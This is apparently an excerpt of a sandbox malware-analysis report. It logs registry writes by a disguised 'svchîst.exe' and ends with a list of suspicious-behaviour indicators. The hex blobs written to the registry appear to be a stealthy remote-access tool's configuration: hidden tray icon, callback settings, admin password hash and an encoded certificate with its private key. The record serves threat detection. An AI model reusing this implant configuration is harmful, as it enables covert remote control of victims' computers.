| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e747275653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c46556d5646566d7471515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c4a484f58525a563278315355633161474a585657646a4d3278365a45645764456c49546d786a626c70775933704661553144515564424d5656465158643357677053527a6c305756647364556c484e5768695631566e597a4e73656d5248566e524a534535735932356163474e3651575647647a4235545770424d45317159336c4e56456b7a5458706f59555a334d48704e616b4577436b317155586c4e56456b7a5458706f5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73525749794d576868567a526e596d314764467054516e6f4b5a56684f4d4670584d47646a4d6c5a355a473173656b31545358644a51566c45566c465252455243624556694d6a466f595663305a324a74526e526155304a365a56684f4d4670584d47646a4d6c5a355a4731736567704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a30744451564646515842794d6e647553445643623064454e32706e55585a7265566b34436a56464d303533595568335a56466b5630464e614442524c3074774e575a5563553569635731774e6d5678525656595446704e5546706f5447747153557074563152484d5652585a6b527063574d76576d6b335644414b6133647951553956564764446332316c62546b725531424b6555397551304a74576c706a61475245636d527052324a544d6b685554444a43643159765255527862574e6952304a79556d64585a6b644d6454557862517036535570436154523652486854554749304f584e4d62575a6b5558673261334e7552574a68595539305a7a6c4b4d6d3930626e6779645463314d6a4e495233633553334d765a33526d556b4e7757456c7859323169436b394a596c4e775546566d63567078614564705a3159795130397353566c4f536d733352433876535452315a6c4e4d54444e6859326c705a6d7871546b4a53596b4e335a48565365457478563159334f5456526545734b646a4d78646e6852636d354354476c6e636e5656656a4e444e444e595a6a41794e306c5152564e79563256585647353555307469616a424361304644614846445355303454474e6f4d48426854475a4b64304d785251703364306c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b465251566b7862474657636a467765554e6c5254683153554a425557644c636d4d305645464461444e6f436a4634513345764d325a786147645a59314e4b59304a454d6a4a515a69744a6347785665444630574770565347527a5647706e63573169646a4e6f516c64705233644b614442465630744c54314a50596e4231566e594b61455a6d5647465855544a42556b70334d5552595232746d566d566e544452724d557843645456556545467252555531625539694d6c6c71626e55314f556c51654852534f433835656d5a58613168545a464a435377705a5757317353455a4359335643546a686161304a45526c4e4763555132646e4d795a3370455a304655556c566b655845354d7a6c345a6e6c484e33567853554e5a4f455a565a5863764f466851616b6f3262556334436e4e7951555654576c49315a316c71616b313459574e7654453835533364746357703255555a4d5658647255334d72635568454d6c4e574d6b46326233564e4e565652615670474d3346754d573031526d4e504c32454b4d3239764f484e705532706b4f565a704c335a436331685263464e704d6c4a4e4f574a6e63476333636b59764e7a684a59314234613370485958426e4e444650546b686a5a476f786156594b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a5355563264306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b74726432646e553278425a3056425157394a516b465251323132596b4e6a5a6d74485a316c516455384b516b4d7256457071656d7455597a4e4362325a434e5549785755463553464a454f48467562446c50627a46316357467563445a76556c4a6a644774334f57314664564e4e5a323161576b3169566b35614f45394c634170364f57314d6446425456454e7a515456535430464c65566f32596a4d315354687553545a6a5355646162477835526a425064444a4a576e524d5757524e646c6c49516c673455553978576e687a5755643052304a61436a685a6454647556324a4e5a3274485447704e55455a4a4f585a714d6e6431576a6b785245687855336c6a556e5277627a59795244427559576b795a6b68684e335a75596d4e6a596b517763586f72517a45355255734b62474e7063486c61637a526f644574724f564972634731785257464c516c685a53545a56614763776256527a55433834616d6b314f556c7a646d52776555744b4b31644e4d455a47633078434d6a56495258467757677059646a4e73524556784c325a584c305a4464574e46645574446454565555474e4d616d526b4c31526963326334556b7430576a566154325a4b53584231554646485555464c5232394a5a33703364486c4955327876436e5134626b464d565652455157644e516b464252554e6e5a30564351556f355557563552484a58576c5135566c4978595652765331466b53473549516c4e4f55484e564e564e6d5a7938355a444a724f48644c6557674b5269733451314e6f4d304e70656b6b316444553264484675563359786558426a4d56566f637a564e616a51325a6d784c55314a6c4f574a45626d466c5a453872556c5279536d4a686555354d4d557450567a52334f517052546d747a56445a445756706d596d64474c30564f62444d3452464a30576d643552574a77636a4a6d5657704a54576f77566d74516156707a4e577461636d566e62574e7657475934566a4a694d3264745a564a4b436a5a74566d49305745747a6443397062304636516e42774e5442555a6d4a3453317051526c4230595655346357643061546c36626e64774d48704b4e58703653304e76565731534f565a4f6332356e637939755532384b535468434e4764305a31677a56484d31636b7433543352484e486473596b5a5854305a364d464235525735455a32396f61575a4461453833615764436448703056546c4562466472597a52524f45706f4f4568464f416f325a476c614d6d6378526d5a46516c646964575647646e68314f545231654546585a6d314c516e5a57555567775654564356456b7763565a465132645a5255457a516e55335132513253557870617a64474e453178436a5246566c6f7255574a5856585a7561556c6e64564631526e41785a4767316433706f516c646864444671554446466232467a5458467a5744565763474e45624468614e4574364d5574615630524464586c455a48674b59585a445a3059304f464e7a597a41794d6e4a48576b7474543341326333424c4f553931517a6c6a554563304f487054556d685961576c365755704a647a637656565230595664744b305130525868355469394a62516f72616b55334d6e46534e314e3064446b77655764784f5767794f53394464327042634442445a316c465158646c4e48524b636d64705a5735446232493452335a6e547a51335747746e6445707553565650536d316c436b357455334a4f65475648646a5a544d6d785462336c364d6a55795745746e63455a4a4e573143576c633052476452656e6f3163307448566b356b4e6d52615130457754476c32526a4e346430524265586478556a514b55455a324e3146334f486c6862584a4f4e6b6c495a48466b63315a4f4e57527a515739484f466c42564574344c324a4d59546c6863573142646b5a7152446830596b314a61314578636a4a6a56584a495a574a6f6377705a4d3246364e3349335a5778304f454e6e57554a71643068745333427565473547655455356230646b5a45527552564a4b4b3156594e4468474d555a75537a49325a5546554f46465952577068616e4e6a4d334a5a436b7070635338764f4656765a6c6b7a536b396b64546849576d706c616e4231533164554d3030315648565659306c79546c46754d454a6a57464a796447784e627a4d3555564530557a684b555735686457524f556a6b4b556e4e56516b64465a6a6850564759304d6b6c4a616c4e575a6c4661626e564a64573535526b64466545777854317042566a52354f4868354e6b59355454464d616e59775969394f517a6c45555574435a31464455676f79556d464d4f4549724b304a6a6432356e53484e475a454e5861556477575746504b30644b564463334d5564595245737861445931545841344b314132576b633263314e4b62584d3253324a354d6a644f5756706c436e6845634652425244643353464678593039724f474a4f5458426e4f454e61535745765a4545724e454e5363456831636c4d78635668515a335a3064564179525574525a326f33646c64465646497a6253744d5432384b4c7a5a78644649316554464554315a6b55456c61624578514d4739356447686b5179746f536c64795348426c4c314e48633168586244685253304a6e555552614f544a6964575a516132464e636d706a65586c575967703051327836556c4a49596b513456334a4c536d307752476c4f655374455544684a656d7057516a52304c31566f623051325332743053545247656d6c3061544253596c4a6e6347777764554649557a4e59616b5a42436b70685a4652736545354a656e4669655531714f47644d4e6b744a5255314d516d39454b304e33597a56796356646d53336c7254456c6d4d586461536c4532557a5a6c565774795a6a684663445273527a46305647734b575442725a55315a624468365a6e6776645656744f454a736331705754304e695955453950516f744c5330744c55564f52434251556b6c575156524649457446575330744c53307443673d3d3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
